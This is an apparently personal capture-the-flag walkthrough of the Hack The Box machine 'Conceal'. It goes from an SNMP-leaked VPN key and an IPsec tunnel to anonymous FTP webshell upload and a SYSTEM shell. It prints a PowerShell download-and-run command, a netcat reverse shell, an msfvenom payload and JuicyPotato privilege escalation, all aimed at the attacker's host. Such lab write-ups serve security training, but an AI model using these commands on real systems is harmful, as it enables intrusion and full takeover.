Hackthebox Conceal Walkthrough Link to heading
Initial Enumeration Link to heading
Port Scan Link to heading
$ sudo nmap -sT -p- -min-rate 10000 -Pn -oN alltcp.txt 10.10.10.116
sudo nmap -sU -p- -min-rate 10000 -Pn -oN alludp.txt 10.10.10.116
[sudo] password for rocky:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-27 19:46 EST
Nmap scan report for 10.10.10.116
Host is up.
All 65535 scanned ports on 10.10.10.116 are filtered
Nmap done: 1 IP address (1 host up) scanned in 130.18 seconds
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-27 19:48 EST
Nmap scan report for 10.10.10.116
Host is up (0.16s latency).
Not shown: 65534 open|filtered ports
PORT STATE SERVICE
500/udp open isakmp
Nmap done: 1 IP address (1 host up) scanned in 14.25 seconds
I have decided to run the Autorecon script as well to confirm i have not missed anything. It took longer time(more than 40min). I could see and additinal udp port 161 as well.Full results are uploaded [here](Rchitect/_top_100_udp_nmap.txt at Yoda · tcprks/Rchitect · GitHub). There 2 services to enumerate( SNMP and ISAKMP)
SNMP Enumeration Link to heading
The tool “snmpwalk” is pre installed in kali. The output of snmpwalk is big and we need to focuss only on the initial section in this case to get some useful information. sample results [here](Rchitect/snmpwalk-result at Yoda · tcprks/Rchitect · GitHub).
snmpwalk -c public -v 1 10.10.10.116
iso.3.6.1.2.1.1.1.0 = STRING: "Hardware: AMD64 Family 23 Model 49 Stepping 0 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.311.1.1.3.1.1
iso.3.6.1.2.1.1.3.0 = Timeticks: (8552333) 23:45:23.33
iso.3.6.1.2.1.1.4.0 = STRING: "IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43"
iso.3.6.1.2.1.1.5.0 = STRING: "Conceal"
iso.3.6.1.2.1.1.6.0 = ""
iso.3.6.1.2.1.1.7.0 = INTEGER: 76
iso.3.6.1.2.1.2.1.0 = INTEGER: 15
Crackstation website helps to crack these PSK hashes.
VPN(IKE) enumeration Link to heading
isakmp service( port-500 related to ipsec VPN) only opened on server.There are some inbuilt scanners in Kali linux to enumerate IPSEC VPN
$ ike-scan -M 10.10.10.116
Starting ike-scan 1.9.4 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.10.116 Main Mode Handshake returned
HDR=(CKY-R=8ec1706b5f6632a8)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration(4)=0x00007080)
VID=1e2b516905991c7d7c96fcbfb587e46100000009 (Windows-8)
VID=4a131c81070358455c5728f20e95452f (RFC 3947 NAT-T)
VID=90cb80913ebb696e086381b5ec427b1f (draft-ietf-ipsec-nat-t-ike-02\n)
VID=4048b7d56ebce88525e7de7f00d6c2d3 (IKE Fragmentation)
VID=fb1de3cdf341b7ea16b7e5be0855f120 (MS-Negotiation Discovery Capable)
VID=e3a5966a76379fe707228231e5ce8652 (IKE CGA version 1)
Ending ike-scan 1.9.4: 1 hosts scanned in 0.325 seconds (3.08 hosts/sec). 1 returned handshake; 0 returned notify
The tunnel uses IKE-V1 as per above results.To confirm its not running on IKE-V2
ike-scan -M -2 10.10.10.116 130 ⨯
Starting ike-scan 1.9.4 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
Ending ike-scan 1.9.4: 1 hosts scanned in 2.594 seconds (0.39 hosts/sec). 0 returned handshake; 0 returned notify
Install “strongswan” to create a tunnel between “conceal” machine and Kali
sudo apt install strongswan 127 ⨯
[sudo] password for rocky:
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following packages will be upgraded:
strongswan
1 upgraded, 0 newly installed, 0 to remove and 1662 not upgraded.
Need to get 101 kB of archives.
After this operation, 3,072 B of additional disk space will be used.
Get:1 http://ftp.harukasan.org/kali kali-rolling/main amd64 strongswan all 5.9.5-2 [101 kB]
Fetched 101 kB in 2s (40.6 kB/s)
(Reading database ... 353790 files and directories currently installed.)
Preparing to unpack .../strongswan_5.9.5-2_all.deb ...
Unpacking strongswan (5.9.5-2) over (5.9.1-1) ...
Setting up strongswan (5.9.5-2) ...
It creates a config file like below. To establish a VPN connection we need to add the parameters in this file.
The lifetime of ipsec is displayed in hex which can be converted to decimal
cat /etc/ipsec.conf
c─$ sudo cat /etc/ipsec.conf 1 ⨯
# ipsec.conf - strongSwan IPsec configuration file
# basic configuration
config setup
charondebug="all"
strictcrlpolicy=no
uniqueids = yes
# Add connections here.
# Sample VPN connections
conn rchitect-to-conceal
authby=secret
auto=add
ike=3des-sha1-modp1024!
esp=3des-sha1!
type=transport
keyexchange=ikev1
left=10.10.14.12
right=10.10.10.116
rightsubnet=10.10.10.116[tcp]
Add the PSK in similiar way “/etc/ipsec.secrets”
$ sudo cat /etc/ipsec.secrets 1 ⨯
# This file holds shared secrets or RSA private keys for authentication.
# RSA private key for this host, authenticating it to any other host
# which knows the public part.
10.10.14.12 10.10.10.116 : PSK "Dudecake1!"
VPN tunnel establishment Link to heading
└─$ sudo ipsec start 4 ⨯
[sudo] password for rocky:
Starting strongSwan 5.9.1 IPsec [starter]...
┌──(rocky㉿kali)-[~/hckbox/conceal]
└─$ sudo ipsec up rchitect-to-conceal
initiating Main Mode IKE_SA rchitect-to-conceal[2] to 10.10.10.116
There is some error due to some alogorithsm not supported by Kali machine.
parsed ID_PROT response 0 [ KE No NAT-D NAT-D ] ENCRYPTION_ALGORITHM 3DES_CBC (key size 0) not supported! key derivation for pre-shared key failed generating INFORMATIONAL_V1 request 1886222546 [ HASH N(INVAL_KE) ]
Installing some more additinal pacakges which support these encryptions
sudo apt install libstrongswan-standard-plugins libstrongswan-extra-plugins
Then reconnect again after making after reviweing the in /etc/ipsec.conf and /etc/ipsec.secrets.
IPSEC.Secrets ( final file) Link to heading
10.10.14.12 10.10.10.116 : PSK "Dudecake1!"
IPSEC.conf ( final file) Link to heading
config setup
charondebug="all"
strictcrlpolicy=no
uniqueids = yes
conn rchitect-to-conceal
authby=secret
auto=add
ike=3des-sha1-modp1024!
esp=3des-sha1!
type=transport
keyexchange=ikev1
left=10.10.14.12
right=10.10.10.116
rightsubnet=10.10.10.116[tcp]
fragmentation=yes
ikelifetime=8h
closeaction=restart
$─$ sudo ipsec status rchitect-to-conceal
Security Associations (1 up, 0 connecting):
rchitect-to-conceal[1]: ESTABLISHED 9 seconds ago, 10.10.14.12[10.10.14.12]...10.10.10.116[10.10.10.116]
rchitect-to-conceal{1}: INSTALLED, TRANSPORT, reqid 1, ESP SPIs: cf332116_i fbc5fa16_o
rchitect-to-conceal{1}: 10.10.14.12/32 === 10.10.10.116/32[tcp]
sudo ipsec start
Starting strongSwan 5.9.5 IPsec [starter]...
┌──(rocky㉿kali)-[~/hckbox/conceal]
└─$ sudo ipsec up rchitect-to-conceal
initiating Main Mode IKE_SA rchitect-to-conceal[1] to 10.10.10.116
generating ID_PROT request 0 [ SA V V V V V ]
sending packet: from 10.10.14.12[500] to 10.10.10.116[500] (176 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.12[500] (208 bytes)
parsed ID_PROT response 0 [ SA V V V V V V ]
received MS NT5 ISAKMPOAKLEY vendor ID
received NAT-T (RFC 3947) vendor ID
received draft-ietf-ipsec-nat-t-ike-02\n vendor ID
received FRAGMENTATION vendor ID
received unknown vendor ID: fb:1d:e3:cd:f3:41:b7:ea:16:b7:e5:be:08:55:f1:20
received unknown vendor ID: e3:a5:96:6a:76:37:9f:e7:07:22:82:31:e5:ce:86:52
selected proposal: IKE:3DES_CBC/HMAC_SHA1_96/PRF_HMAC_SHA1/MODP_1024
generating ID_PROT request 0 [ KE No NAT-D NAT-D ]
sending packet: from 10.10.14.12[500] to 10.10.10.116[500] (244 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.12[500] (260 bytes)
parsed ID_PROT response 0 [ KE No NAT-D NAT-D ]
generating ID_PROT request 0 [ ID HASH N(INITIAL_CONTACT) ]
sending packet: from 10.10.14.12[500] to 10.10.10.116[500] (100 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.12[500] (68 bytes)
parsed ID_PROT response 0 [ ID HASH ]
IKE_SA rchitect-to-conceal[1] established between 10.10.14.12[10.10.14.12]...10.10.10.116[10.10.10.116]
scheduling reauthentication in 9817s
maximum IKE_SA lifetime 10357s
generating QUICK_MODE request 2535544478 [ HASH SA No ID ID ]
sending packet: from 10.10.14.12[500] to 10.10.10.116[500] (164 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.12[500] (188 bytes)
parsed QUICK_MODE response 2535544478 [ HASH SA No ID ID ]
selected proposal: ESP:3DES_CBC/HMAC_SHA1_96/NO_EXT_SEQ
CHILD_SA rchitect-to-conceal{1} established with SPIs cfaffc4f_i f5082174_o and TS 10.10.14.12/32 === 10.10.10.116/32[tcp]
connection 'rchitect-to-conceal' established successfully
─$ sudo ipsec status rchitect-to-conceal
Security Associations (1 up, 0 connecting):
rchitect-to-conceal[1]: ESTABLISHED 9 seconds ago, 10.10.14.12[10.10.14.12]...10.10.10.116[10.10.10.116]
rchitect-to-conceal{1}: INSTALLED, TRANSPORT, reqid 1, ESP SPIs: cf332116_i fbc5fa16_o
rchitect-to-conceal{1}: 10.10.14.12/32 === 10.10.10.116/32[tcp]
If still some issues are occuring due the mismatch refer this[ blog](Setup a Site to Site IPsec VPN With Strongswan and PreShared Key Authentication - Ruan Bekker’s Blog).
Recon over IPSEC VPN Link to heading
The results after running the nmap port scans after connected to VPN.
└─$ sudo nmap -sT -p- -min-rate 10000 -Pn -oN alltcp.txt 10.10.10.116
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-01 00:40 EST
Warning: 10.10.10.116 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.116
Host is up (0.054s latency).
Not shown: 63985 closed ports, 1538 filtered ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
nmap -p 21,80,135,139,445,49664-49670 -Pn -sC -sV -oN detailed.txt 10.10.10.116
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-01 00:44 EST
Nmap scan report for 10.10.10.116
Host is up (0.057s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-03-01T05:45:28
|_ start_date: 2022-02-28T00:21:39
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.45 seconds
sudo nmap -p 21,80,135,139,445,49664-49670 -script VULN 10.10.10.116 130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-01 00:47 EST
Nmap scan report for 10.10.10.116
Host is up (0.054s latency).
PORT STATE SERVICE
21/tcp filtered ftp
80/tcp filtered http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
49664/tcp filtered unknown
49665/tcp filtered unknown
49666/tcp filtered unknown
49667/tcp filtered unknown
49668/tcp filtered unknown
49669/tcp filtered unknown
49670/tcp filtered unknown
Host script results:
| firewall-bypass:
|_ Firewall vulnerable to bypass through ftp helper. (IPv4)
udo nmap -p 139,135,445 -script smb-enum-shares.nse 10.10.10.116
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-01 00:48 EST
Nmap scan report for 10.10.10.116
Host is up (0.056s latency).
PORT STATE SERVICE
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 2.27 seconds
┌──(rocky㉿kali)-[~/hckbox/conceal]
└─$ sudo nmap -p 135,139,445 -script smb-enum-users.nse 10.10.10.116
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-01 00:48 EST
Nmap scan report for 10.10.10.116
Host is up (0.055s latency).
PORT STATE SERVICE
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 2.30 seconds
The FTP login seems annonymous. However once logged in there were no files and for testing i have uploaded a file.
$ ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:rocky): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> ls -al
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> pwd
257 "/" is current directory.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> exit
421 Service not available, remote server has closed connection
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump]
└─$ echo "sample file rchitect" > test.txt
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump]
└─$ ftp 10.10.10.116
ftp: connect: Connection timed out
ftp> exit
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump]
└─$ ftp 10.10.10.116
ftp: connect: Connection timed out
ftp> ^C
ftp> exit
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump]
└─$ ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:rocky): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
22 bytes sent in 0.00 secs (477.4305 kB/s)
ftp> exit
221 Goodbye.
Now the file uploaded. However to find the upload directory the gobuster basic scan is perfomrmed and I could see only one folder.
gobuster dir -u http://10.10.10.116 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.116
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/03/01 01:10:42 Starting gobuster in directory enumeration mode
===============================================================
/upload (Status: 301) [Size: 150] [--> http://10.10.10.116/upload/]
===============================================================
2022/03/01 01:11:19 Finished
===============================================================
The reverse shell in php format upload was not completing. cmd.aspx file was also not working.The issue was the upload was slow and the shell we upload should be max 100bytes.
─(rocky㉿kali)-[~/hckbox/conceal/ftpdump]
└─$ ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:rocky): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put cmdsimple.asp
local: cmdsimple.asp remote: cmdsimple.asp
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
102 bytes sent in 0.00 secs (1.7370 MB/s)
ftp> exit
221 Goodbye.
I have used this code which is max 100bytes.
The issue with the size if due the fragmenetaion was not enabled on ipsec.conf we did.The config has been chnaged with fragmenetaion enabled.
$ sudo tail -10 /etc/ipsec.conf
ike=3des-sha1-modp1024!
esp=3des-sha1!
type=transport
keyexchange=ikev1
left=10.10.14.12
right=10.10.10.116
rightsubnet=10.10.10.116[tcp]
fragmentation=yes
ikelifetime=8h
closeaction=restart
Still i was having trouble with upload and it has been corrected after reducing the mtu. The connection was IPSEC +openVPN( which makes sense of additional overhead causing the transfer issues). I have chnaged it to 1000( its temporrray change and once you reboot it will be back to 1500)
─(rocky㉿kali)-[/opt]
└─$ sudo ifconfig tun0 mtu 1000
Now the FTP transfer is happening smooth. I have used the webshell found here.
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump]
└─$ ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:rocky): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put rchi.asp
local: rchi.asp remote: rchi.asp
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1412 bytes sent in 0.00 secs (12.1314 MB/s)
ftp> exit
221 Goodbye.
Use the Nishang’s Powershell script to get the reverse shell.
$ tail -5 Invoke-PowerShellTcp.ps1
Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
Write-Error $_
}
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.12 -Port 4444
However when i try to access the same webshell which was accessible 1 min ago , it was throwing 404 error.
It seems the files are not accesible as soon as we close the ftp file transfer. So i have decided to keep the FTP tranfer on and open the python webserver running from a different folder to fetch the reverse shell script.
FTP upload on new name
──(rocky㉿kali)-[~/hckbox/conceal/ftpdump]
└─$ ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:rocky): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put rchitect.asp
local: rchitect.asp remote: rchitect.asp
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1412 bytes sent in 0.00 secs (16.8324 MB/s)
ftp>
Python webserver on new directory
┌──(rocky㉿kali)-[/opt/AutoRecon]
└─$ cd ~/hckbox/conceal/ftpdump/web
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump/web]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
^C
Keyboard interrupt received, exiting.
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump/web]
└─$ ls
Invoke-PowerShellTcp.ps1
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump/web]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.116 - - [01/Mar/2022 20:36:40] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
Code to be used for reverse shell
powershell "iex(new-object net.webclient).downloadString('http://10.10.14.12:8000/Invoke-PowerShellTcp.ps1')
Netcat listener and Reverse shell
──(rocky㉿kali)-[~]
└─$ rlwrap nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.116] 49674
Windows PowerShell running as user CONCEAL$ on CONCEAL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
whoami
conceal\destitute
PS C:\Windows\SysWOW64\inetsrv>
Privilege Escalation Link to heading
Check the privilege for current User
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeShutdownPrivilege Shut down the system Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
PS C:\Windows\SysWOW64\inetsrv>
The below one privilege can be exploited using the [Juicypotato](Release Fresh potatoes · ohpe/juicy-potato · GitHub) for most of the windows machine
SeImpersonatePrivilege Impersonate a client after authentication Enabled
I have tried uploading the Juicypotato with FTP( similiarway) we did for reverse shell however the server immiediatly deletes the file. So I have decided to use smbserver method to copy from Kali to windows.
Issues while transferring file via FTP
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> put JuicyPotato.exe
local: JuicyPotato.exe remote: JuicyPotato.exe
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
348468 bytes sent in 0.39 secs (876.0975 kB/s)
ftp>
On Windows It shows does not exist
cd wwwroot
cd upload
ls
PS C:\inetpub\wwwroot\upload>
dir
ls
cp JuicyPotato.exe c:\users\Public
PS C:\inetpub\wwwroot\upload> PS C:\inetpub\wwwroot\upload> cp : Cannot find path 'C:\inetpub\wwwroot\upload\JuicyPotato.exe' because it does not exist.
SMBshare transfer between Linux and Windows
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump/web]
└─$ smbserver.py share . -smb2support -username df -password df
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
On WIndows
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/10/2018 23:07 Administrator
d----- 12/10/2018 23:12 DefaultAppPool
d----- 12/10/2018 20:16 Destitute
d-r--- 12/10/2018 20:08 Public
d----- 12/10/2018 23:54 test
d----- 12/10/2018 23:40 WWW Anon Access
cd Destitute
cd Documents
net use \\10.10.14.12\share /u:df df
The command completed successfully.
copy \\10.10.14.12\share\JuicyPotato.exe JuicyPotato.exe
ls
Directory: C:\Users\Destitute\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 03/03/2022 00:07 347648 JuicyPotato.exe
net use /d \\10.10.14.12\share
\\10.10.14.12\share was deleted successfully
In my earlier experience, i had trouble in running juicypotato from powershell. Its easier to get it excecute from a normal command prompt. I have copied “nc.exe” to windows.
──(rocky㉿kali)-[~/hckbox/conceal/ftpdump/web]
└─$ cp /usr/share/windows-resources/binaries/nc.exe .
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump/web]
└─$ ls
Invoke-PowerShellTcp.ps1 JuicyPotato.exe nc.exe
On Windows
copy \\10.10.14.12\share\nc.exe nc.exe
ls
Directory: C:\Users\Destitute\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 03/03/2022 00:07 347648 JuicyPotato.exe
-a---- 03/03/2022 00:23 59392 nc.exe
net use /d \\10.10.14.12\share
\\10.10.14.12\share was deleted successfully.
Directory: C:\Users\Destitute\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 03/03/2022 00:07 347648 JuicyPotato.exe
-a---- 03/03/2022 00:23 59392 nc.exe
net use /d \\10.10.14.12\share
\\10.10.14.12\share was deleted successfully.
.\nc.exe -e cmd.exe 10.10.14.12 8989
Got a normal commnd shell and now we see the systeminfo to find the CLSID
$ nc -nvlp 8989
listening on [any] 8989 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.116] 49679
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\Users\Destitute\Documents>systeminfo
systeminfo
Host Name: CONCEAL
OS Name: Microsoft Windows 10 Enterprise
OS Version: 10.0.15063 N/A Build 15063
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00329-00000-00003-AA343
Original Install Date: 12/10/2018, 20:04:27
System Boot Time: 02/03/2022, 00:21:13
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-gb;English (United Kingdom)
Input Locale: en-gb;English (United Kingdom)
Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,060 MB
Virtual Memory: Max Size: 3,199 MB
Virtual Memory: Available: 2,211 MB
Virtual Memory: In Use: 988 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0 2
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.116
[02]: fe80::e97c:8980:56ae:4cc9
[03]: dead:beef::7593:12e5:4a97:139c
[04]: dead:beef::69d7:5f30:5fa5:e0af
[05]: dead:beef::e97c:8980:56ae:4cc9
[06]: dead:beef::4d
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
First i have tried without mentioning and CLSID. however it failed.
Directory of C:\Users\Destitute\Documents
03/03/2022 00:41 <DIR> .
03/03/2022 00:41 <DIR> ..
03/03/2022 00:07 347,648 JuicyPotato.exe
03/03/2022 00:23 59,392 nc.exe
03/03/2022 00:41 56 rev.bat
3 File(s) 407,096 bytes
2 Dir(s) 9,699,618,816 bytes free
C:\Users\Destitute\Documents>JuicyPotato.exe -t * -p rev.bat -l 5555
JuicyPotato.exe -t * -p rev.bat -l 5555
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 5555
COM -> recv failed with error: 10038
Tried another one from the CLSID found taken from here and it failed due to the wrong
CLSIDC:\Users\Destitute\Documents>JuicyPotato.exe -t * -p rev.bat -l 5555 -c {9E175B9C-F52A-11D8-B9A5-505054503030}
JuicyPotato.exe -t * -p rev.bat -l 5555 -c {9E175B9C-F52A-11D8-B9A5-505054503030}
Testing {9E175B9C-F52A-11D8-B9A5-505054503030} 5555
COM -> recv failed with error: 10038
Using the correct CLSID i am able to see it works.
C:\Users\Destitute\Documents>JuicyPotato.exe -t * -p rev.bat -l 5555 -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
JuicyPotato.exe -t * -p rev.bat -l 5555 -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
Testing {e60687f7-01a1-40aa-86ac-db1cbf673334} 5555
......
[+] authresult 0
{e60687f7-01a1-40aa-86ac-db1cbf673334};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
However there is no reverse shell. Intead of nc.exe I have created msfvenom reverse shell and repeated the same process with CLSID and i have got the privileged shell.
─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.12 LPORT=5555 --arch x64 -f exe -o backdoor.exe 130 ⨯
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: backdoor.exe
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump/web]
└─$ smbserver.py share . -smb2support -username df -password df
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporatio
On Windows
c:\Users\Destitute>cd Documents
cd Documents
c:\Users\Destitute\Documents>net use \\10.10.14.12\share /u:df df
net use \\10.10.14.12\share /u:df df
The command completed successfully.
c:\Users\Destitute\Documents>copy \\10.10.14.12\share\backdoor.exe backdoor.exe
copy \\10.10.14.12\share\backdoor.exe backdoor.exe
1 file(s) copied.
c:\Users\Destitute\Documents>JuicyPotato.exe -t * -p backdoor.exe -l 5555 -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
JuicyPotato.exe -t * -p backdoor.exe -l 5555 -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
Testing {e60687f7-01a1-40aa-86ac-db1cbf673334} 5555
......
[+] authresult 0
{e60687f7-01a1-40aa-86ac-db1cbf673334};NT AUTHORITY\SYSTEM
Privileged shell
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.12
LHOST => 10.10.14.12
msf6 exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.12 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.12:5555
[*] Sending stage (200262 bytes) to 10.10.10.116
[*] Meterpreter session 1 opened (10.10.14.12:5555 -> 10.10.10.116:49701) at 2022-03-02 20:05:32 -0500
meterpreter > whoami
[-] Unknown command: whoami
meterpreter > shell
Process 4540 created.
Channel 1 created.
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
